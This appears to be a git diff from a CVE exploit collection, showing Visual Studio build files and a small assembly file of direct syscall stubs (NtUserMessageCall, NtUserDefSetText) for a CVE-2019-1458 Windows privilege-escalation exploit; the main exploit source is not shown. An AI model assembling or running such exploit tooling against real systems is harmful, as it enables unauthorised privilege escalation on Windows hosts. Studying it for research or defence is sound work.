<PlatformToolset>v120</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v120</PlatformToolset>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>
</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>
</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<SDLCheck>true</SDLCheck>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
<DelayLoadDLLs>
</DelayLoadDLLs>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="Source.cpp" />
</ItemGroup>
<ItemGroup>
<MASM Include="shellcode.asm" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>

27
00-CVE_EXP/CVE-2019-1458/cve-2019-1458/cve-2019-1458.vcxproj.filters Normal file
View File

@ -0,0 +1,27 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="Source.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<MASM Include="shellcode.asm">
<Filter>Source Files</Filter>
</MASM>
</ItemGroup>
</Project>

4
00-CVE_EXP/CVE-2019-1458/cve-2019-1458/cve-2019-1458.vcxproj.user Normal file
View File

@ -0,0 +1,4 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup />
</Project>

22
00-CVE_EXP/CVE-2019-1458/cve-2019-1458/shellcode.asm Normal file
View File

@ -0,0 +1,22 @@
_TEXT SEGMENT
EXTERNDEF g_NtUserDefSetText_syscall:dword
EXTERNDEF g_NtUserMessageCall_syscall:dword
PUBLIC NtUserMessageCall
NtUserMessageCall PROC
mov r10, rcx
mov eax, g_NtUserMessageCall_syscall
syscall
ret
NtUserMessageCall ENDP
PUBLIC NtUserDefSetText
NtUserDefSetText PROC
mov r10, rcx
mov eax, g_NtUserDefSetText_syscall
syscall
ret
NtUserDefSetText ENDP
_TEXT ENDS
END